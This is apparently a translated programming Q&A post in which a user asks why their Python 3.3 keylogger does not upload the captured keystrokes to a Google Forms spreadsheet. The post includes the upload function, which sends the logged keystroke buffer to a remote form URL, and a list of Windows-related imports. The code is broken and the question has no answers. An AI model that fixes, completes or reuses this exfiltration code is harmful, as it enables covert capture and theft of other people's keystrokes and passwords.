与Google驱动器键盘记录程序相关的问题

时间:2013-12-12 10:33:19

标签: python project urllib2 google-drive-api keylogger

我打算尽可能准确地说出来。

所以我得到了这个我正在使用的Python(使用3.3)键盘记录器,除了事实上它没有将记录的输入写入我输入的表单电子表格之外,一切都运行良好。

我可以说我花了4个多小时试图找出导致这个问题的原因。

我的功能如下:

def GDrive():

global data
if len(data)>100:
    url="https://docs.google.com/forms/d/16ia5WLlQRxVVWNJVogVrbggUDkqj7E6Le3eSbwsIPkw/viewform"
    klog={'entry.789302263':data} 

    dataenc=urllib.urlencode(klog)
    req=urllib2.request(url,dataenc)
    response=urllib2.urlopen(req)
    data=''

return True 

我认为可能是造成这种情况的一个原因是urllib2模块。导入是不可能的。我正在使用的模块:

导入sys,记录 导入时间,日期时间 import urllib,urllib.request import win32event,win32api,winerror

真的希望有人能够帮助我。

0 个答案:

没有答案